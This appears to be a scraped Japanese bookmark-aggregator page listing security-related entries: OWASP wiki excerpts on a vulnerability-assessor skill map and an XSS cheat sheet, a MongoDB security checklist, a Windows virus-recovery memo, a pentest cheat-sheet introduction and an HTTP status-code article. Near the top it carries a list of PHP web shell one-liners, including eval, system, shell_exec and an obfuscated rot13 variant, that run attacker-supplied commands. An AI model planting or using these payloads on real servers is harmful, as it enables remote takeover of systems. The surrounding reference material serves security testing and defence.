You signed in with another tab or window. Reload to refresh your session. You signed out in another tab or window. Reload to refresh your session. You switched accounts on another tab or window. Reload to refresh your session. Dismiss alert
<?php system($_GET["cmd"]); ?> <?php system($_GET[1]); ?> <?php system("`$_GET[1]`"); ?> <?= system($_GET[cmd]); <?=`$_GET[1]`; <?php eval($_POST[cmd]);?> <?php echo `$_GET[1]`; <?php echo passthru($_GET['cmd']); <?php echo shell_exec($_GET['cmd']); <?php eval(str_rot13('riny($_CBFG[cntr]);'));?> <script language="php">system("id"); </script> <?php $_GET['a']($_GET['b']); ?> // a=system&b=ls // a=
This site is the archived OWASP Foundation Wiki and is no longer accepting Account Requests. To view the new OWASP Foundation website, please visit https://owasp.org 脆弱性診断士スキルマッププロジェクト 特定非営利活動法人日本ネットワークセキュリティ協会の日本セキュリティオペレーション事業者協議会のセキュリティオペレーションガイドラインWG(WG1)と、OWASP Japan主催の共同ワーキンググループである 「脆弱性診断士スキルマッププロジェクト (代表 上野宣)」では、脆弱性診断を行う個人の技術的な能力を具体的にすべく、脆弱性診断を行う技術者(以下、脆弱性診断士)のスキルマップと学習の指針となるシラバス、脆弱性診断を行うた
この資料は、アプリケーションのセキュリティテストを行う技術者に、クロスサイトスクリプティングのテストを支援するガイドを提供することに重点を置いています。この資料の初期版は、RSnake から OWASP に寄付されたもので、彼のセミナーの XSS チートシートが元になっています(http://ha.ckers.org/xss.html)。現在このサイトにアクセスすると、この新しいサイトにリダイレクトされるようになっており、今後はここで保守や強化が行われる予定です。最初に作成された OWASP 対策チートシート、XSS (クロスサイトスクリプティング) 対策チートシートは、RSnake の XSS チートシートをベースにしています。彼に謝意を表します。私たちは、攻撃に関する複雑なチートシートにあらゆる巧妙なトリックを列挙して、とにかくこれらを防ぐアプリケーションを構築せよと開発者に言うのでは
This document provides a list of security measures that you should implement to protect your MongoDB installation. The list is not meant to be exhaustive. Pre-production Checklist/Considerations Enable access control and specify an authentication mechanism. MongoDB Community supports a number of authentication mechanisms that clients can use to verify their identity: SCRAM (Default) x.509 Certific
ウイルス感染した後の手動&目視チェック自分用まとめ まず、PCが起動する、しないに関わらず、ブート領域を修復しておきます。 (ブートセクタがウイルス感染している可能性もあるため) コマンドプロンプトからWindowsを復旧する4つの方法(Vista/7/8/8.1/10) UEFI/GPT インストールしたWindowsの、ブート領域の復旧方法メモ 上記ページ内の bootrec /Rebuildbcd 、 bootrec /fixboot、 bootrec /fixmbr あたりのコマンドを実行しておく。 私の場合、Paragon Backup & Recoveryを使って ブート領域のみをバックアップしているので、それを利用して復旧している。 UEFI(GPT) Windows の場合、OSインストール時の操作手順によっては「Paragon Backup & Recovery を使って
Introduction Penetration testing tools cheat sheet, a quick reference high level overview for typical penetration testing engagements. Designed as a quick reference cheat sheet providing a high level overview of the typical commands used during a penetration testing engagement. For more in depth information I’d recommend the man file for the tool, or a more specific pen testing cheat sheet from th
HTTPステータスコードを返すというのはとても単純なことです。ページがレンダリングできた?よし、それなら 200 を返しましょう。ページが存在しない?それなら 404 です。他のページにユーザをリダイレクトしたい? 302 、あるいは 301 かもしれません。 I like to imagine that HTTP status codes are like CB 10 codes. "Breaker breaker, this is White Chocolate Thunder. We've got a 200 OK here." — Aaron Patterson (@tenderlove) 2015, 10月 7 訳:HTTPのステータスコードのことは、市民ラジオの10コードみたいなものだと考えるのが好きです。「ブレーカー、ブレーカー、こちらホワイト・チョコレート・サンダー。200
Not your computer? Use a private browsing window to sign in. Learn more
リリース、障害情報などのサービスのお知らせ
最新の人気エントリーの配信
処理を実行中です
j次のブックマーク
k前のブックマーク
lあとで読む
eコメント一覧を開く
oページを開く